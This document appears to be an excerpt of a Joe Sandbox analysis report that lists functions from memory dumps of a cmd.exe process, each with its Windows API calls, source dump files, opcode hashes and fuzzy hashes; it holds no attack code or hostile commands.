                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorMode$FullNamePath
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 268959451-0
                                                                                                                                            • Opcode ID: cd90c0a58dedc504f08531fdf7902830367ccd18b39938b0ded52bea57e98d30
                                                                                                                                            • Instruction ID: 703dd3cb8b5a34558b526d1a97cf85330535cb53ad8df6392dd16855f645bd4c
                                                                                                                                            • Opcode Fuzzy Hash: cd90c0a58dedc504f08531fdf7902830367ccd18b39938b0ded52bea57e98d30
                                                                                                                                            • Instruction Fuzzy Hash: 7D315C39520101ABCB28DF68C855A7FB7B5EF84301728851EED07CB294E7B1AE69C758
                                                                                                                                            Function 0024C570 Relevance: 6.1, APIs: 4, Instructions: 101memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0024C5BD
                                                                                                                                            • RtlFreeHeap.NTDLL ref: 0024C5C4
                                                                                                                                            • _setjmp3.MSVCRT ref: 0024C630
                                                                                                                                            • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 0024C69D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2613391085-0
                                                                                                                                            • Opcode ID: f3265a1d5c2acaf2206705f6f1915352ca104a37cc94e51eb908152ca929624b
                                                                                                                                            • Instruction ID: f64f78d9fd518fc9894784ca820b753dd46bc449d28b4c1c2f7b523470b683f4
                                                                                                                                            • Opcode Fuzzy Hash: f3265a1d5c2acaf2206705f6f1915352ca104a37cc94e51eb908152ca929624b
                                                                                                                                            • Instruction Fuzzy Hash: E531AF70B266028FEB58DF68F88D72AB7B4FB44744F65802AE80DD7250E7749C948F91
                                                                                                                                            Function 00252960 Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • wcstol.MSVCRT ref: 00252977
                                                                                                                                            • wcstol.MSVCRT ref: 00252987
                                                                                                                                            • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0024E559,?,?,00000000,?), ref: 002529FF
                                                                                                                                            • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0024E559,?,?,00000000,?), ref: 00252A09
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wcstol$lstrcmplstrcmpi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4273384694-0
                                                                                                                                            • Opcode ID: d878027151fbf22b96c995eafbb0df38b87ee4a027144c05663d95cde52c7f7a
                                                                                                                                            • Instruction ID: 0b60afd0e3d46c0f35964e00f6c7489c67a341cc5e3a0a0a4ae49ba267d20d95
                                                                                                                                            • Opcode Fuzzy Hash: d878027151fbf22b96c995eafbb0df38b87ee4a027144c05663d95cde52c7f7a
                                                                                                                                            • Instruction Fuzzy Hash: 0E11D532821117EB87255E788A0C97ABB68FF02352B250210EC01E7790D7B1ED7C96E8
                                                                                                                                            Function 0026C535 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • memset.MSVCRT ref: 0026C56B
                                                                                                                                              • Part of subcall function 0024E3F0: memset.MSVCRT ref: 0024E455
                                                                                                                                            • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 0026C5A5
                                                                                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0026C5BD
                                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 0026C5DA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1029679093-0
                                                                                                                                            • Opcode ID: d219ff35a60fd30e762a9f0e209b5cc149cebfe5b3e355575e04b43cc31e3d2f
                                                                                                                                            • Instruction ID: 7d8041216090efe038f2331d127b0a452580a89d7ee55a0e33f63793b4451d22
                                                                                                                                            • Opcode Fuzzy Hash: d219ff35a60fd30e762a9f0e209b5cc149cebfe5b3e355575e04b43cc31e3d2f
                                                                                                                                            • Instruction Fuzzy Hash: 4D216671A1010AABEF10DFA5EC89BBFBBB8EB44344F540469A505E3141D774EA548B61
                                                                                                                                            Function 00254C40 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 37e80f3804b37d1197d7eeb94ef8a5f068ad90f36264adb8b68c25f28265b13f
                                                                                                                                            • Instruction ID: 492d56de221e304292f88cf6a41beda721165181ded542ccf8e5a345e998ea12
                                                                                                                                            • Opcode Fuzzy Hash: 37e80f3804b37d1197d7eeb94ef8a5f068ad90f36264adb8b68c25f28265b13f
                                                                                                                                            • Instruction Fuzzy Hash: 4411E235222505EBDB185F24AC8DFAF7619EF8132DF14811AE802C61D0DB70DDA2AB95
                                                                                                                                            Function 00269809 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _get_osfhandle.MSVCRT ref: 00269822
                                                                                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,002692EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0026982A
                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00269841
                                                                                                                                            • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 0026986E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2448200120-0
                                                                                                                                            • Opcode ID: c2375bb0c35553a3a30fff55aac2054e5cdaebeceeb20f150eaf67abfdb72168
                                                                                                                                            • Instruction ID: c1c7a1cd0cec7fc68c355f374176152f54ef0e62c0b78ce2283ecded95cfa724
                                                                                                                                            • Opcode Fuzzy Hash: c2375bb0c35553a3a30fff55aac2054e5cdaebeceeb20f150eaf67abfdb72168
                                                                                                                                            • Instruction Fuzzy Hash: 7211C131620201AFDB199F25EC4DA7F776DEB86B65F10002AF40997151DE758CE08F65
                                                                                                                                            Function 0024DD20 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,0024BDB3,00000000,?), ref: 0024DD37
                                                                                                                                            • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0024DD3E
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0024DD53
                                                                                                                                            • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0024DD5A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$AllocSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2549470565-0
                                                                                                                                            • Opcode ID: f2b2370ff46c6af2900de49708a9f786852323dc7081500695b5846aa4a51aa6
                                                                                                                                            • Instruction ID: d1a23370ea3249936bb4a61fac2a1123565303df0d040f0887aedb195bcba6c7
                                                                                                                                            • Opcode Fuzzy Hash: f2b2370ff46c6af2900de49708a9f786852323dc7081500695b5846aa4a51aa6
                                                                                                                                            • Instruction Fuzzy Hash: 5901B57B621202DBDB259F64EC8DF99B768EB84B56F240021F509C7050DB75DC68C791
                                                                                                                                            Function 00268496 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00248A51), ref: 002684B9
                                                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00248A51), ref: 002684C6
                                                                                                                                            • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00248A51), ref: 002684EA
                                                                                                                                            • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00248A51), ref: 002684F2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1033415088-0
                                                                                                                                            • Opcode ID: e50d1a23064593e5fda4615ac30877a7597e88a2c564ff972a885e6575bda4a4
                                                                                                                                            • Instruction ID: 48ce130a1dcef211a0d197359c3c0c766e770b15b0e3bca9f77c66b443dcc38d
                                                                                                                                            • Opcode Fuzzy Hash: e50d1a23064593e5fda4615ac30877a7597e88a2c564ff972a885e6575bda4a4
                                                                                                                                            • Instruction Fuzzy Hash: 34018F71A11119AF9B059FB8AC88AFFB7ECEF0D310B00012AF902E2150EE749D16C769
                                                                                                                                            Function 002624F6 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,002622F8), ref: 00262514
                                                                                                                                            • RtlFreeHeap.NTDLL ref: 0026251B
                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,002622F8), ref: 00262539
                                                                                                                                            • RtlFreeHeap.NTDLL ref: 00262540
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3859560861-0
                                                                                                                                            • Opcode ID: dc5dadc4239e93616ae3e53dc6b08b38932d13782641eb273e9f34dc7ecb0314
                                                                                                                                            • Instruction ID: 053434aaccd7ce2e1458732cced12d428c1422875a30a583a71a67fbc861a2e5
                                                                                                                                            • Opcode Fuzzy Hash: dc5dadc4239e93616ae3e53dc6b08b38932d13782641eb273e9f34dc7ecb0314
                                                                                                                                            • Instruction Fuzzy Hash: 00F06872611601AFD7249FA0ED8CB56B7F8FF48312F14051EE145C6040DB78E9A5CBA1
                                                                                                                                            Function 00256860 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00256F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00256F4F
                                                                                                                                            • __set_app_type.MSVCRT ref: 00256872
                                                                                                                                            • __p__fmode.MSVCRT ref: 00256888
                                                                                                                                            • __p__commode.MSVCRT ref: 00256896
                                                                                                                                            • __setusermatherr.MSVCRT ref: 002568B7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                            • Opcode ID: ca4cf96503859874b4f83cd4e59a16505588a7185002033189db6ebef936b0fa
                                                                                                                                            • Instruction ID: 5d8bfdd31c756879f9bc2640d364859bee2ac5ad334c615e9cd7d5f26f3c9a90
                                                                                                                                            • Opcode Fuzzy Hash: ca4cf96503859874b4f83cd4e59a16505588a7185002033189db6ebef936b0fa
                                                                                                                                            • Instruction Fuzzy Hash: F5F01C38529300CFDB246F30FD0E6083B60B705322B418A5AF862872F1EFB99454CF06
                                                                                                                                            Function 03C17D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-
                                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                            • Instruction ID: dcc40e9c352645ddb0b2018cbd8ebaf6f15c7cef958eeb5c4f10614229683ecb
                                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                            • Instruction Fuzzy Hash: 4A91A271E0021A9FDF24DE69CC80ABFB7E5AF46720F18455AE865EB2C0D7309A60B750
                                                                                                                                            Function 03BD9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $$@
                                                                                                                                            • API String ID: 0-1194432280
                                                                                                                                            • Opcode ID: 5caa604e7a59dcef6d3ccc2dde2ed66e3de0b90c6d11b1e40a967b79e3618d6d
                                                                                                                                            • Instruction ID: 9c80e69b107be0092113b76c1aea8deabaf880bd252727c88fd54a9098e119a4
                                                                                                                                            • Opcode Fuzzy Hash: 5caa604e7a59dcef6d3ccc2dde2ed66e3de0b90c6d11b1e40a967b79e3618d6d
                                                                                                                                            • Instruction Fuzzy Hash: 29810975D002699BDB21DB54CC45BEEB7B8AF09714F0445EAE919FB280E7709E84CFA0
                                                                                                                                            Function 00249CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 191COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0024DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0024ACD8,00000001,?,00000000,00248C23,-00000105,0026C9B0,00000240,00251E92,00000000,00000000,0025ACE0,00000000), ref: 0024DCE1
                                                                                                                                              • Part of subcall function 0024DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0024ACD8,00000001,?,00000000,00248C23,-00000105,0026C9B0,00000240,00251E92,00000000,00000000,0025ACE0,00000000,00000000), ref: 0024DCE8
                                                                                                                                              • Part of subcall function 0024A62F: wcschr.MSVCRT ref: 0024A635
                                                                                                                                              • Part of subcall function 0024C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0024C5BD
                                                                                                                                              • Part of subcall function 0024C570: RtlFreeHeap.NTDLL ref: 0024C5C4
                                                                                                                                              • Part of subcall function 0024C570: _setjmp3.MSVCRT ref: 0024C630
                                                                                                                                            • _wcsupr.MSVCRT ref: 0025C21F
                                                                                                                                              • Part of subcall function 00251A47: memset.MSVCRT ref: 00251AE2
                                                                                                                                              • Part of subcall function 00251A47: ??_V@YAXPAX@Z.MSVCRT(00252229,?,00252229,00000000,-00000105,?,00000000,00000000), ref: 00251BA4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                                                                                            • String ID: FOR$ IF
                                                                                                                                            • API String ID: 3818062306-2924197646
                                                                                                                                            • Opcode ID: fc9cabd94c20dcd257498b4a13c7391032b199020c62900d832ba60163b01b34
                                                                                                                                            • Instruction ID: f393b6b92310a2cf1d253790c4b677928b912cb3b4505ed23e28f8d701b40037
                                                                                                                                            • Opcode Fuzzy Hash: fc9cabd94c20dcd257498b4a13c7391032b199020c62900d832ba60163b01b34
                                                                                                                                            • Instruction Fuzzy Hash: BF513621B202039ADB2D7F78D85577B22A2EF90B54F684029DD06CB294FBB1DDB1C680
                                                                                                                                            Function 0024AD26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,0024B11F), ref: 0025CB8B
                                                                                                                                            • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 0025CC2D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168577004.0000000000240000.00000040.80000000.00040000.00000000.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000026E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168577004.000000000028A000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4168715533.000000000028E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_240000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleTitle
                                                                                                                                            • String ID: -
                                                                                                                                            • API String ID: 3358957663-3695764949
                                                                                                                                            • Opcode ID: 377a3cc7e7ade734e4e98e9b710efec979d3186e9c5978e77c163ad220ef0b85
                                                                                                                                            • Instruction ID: db974be60f3fa0f33e7966ad097c8aa489f3e59179cde4282073566e7659f2d8
                                                                                                                                            • Opcode Fuzzy Hash: 377a3cc7e7ade734e4e98e9b710efec979d3186e9c5978e77c163ad220ef0b85
                                                                                                                                            • Instruction Fuzzy Hash: 5F217D31B102018BC71DAF2CE89D77E77A1DBC0705F28402DE8065B345EE749D96CB82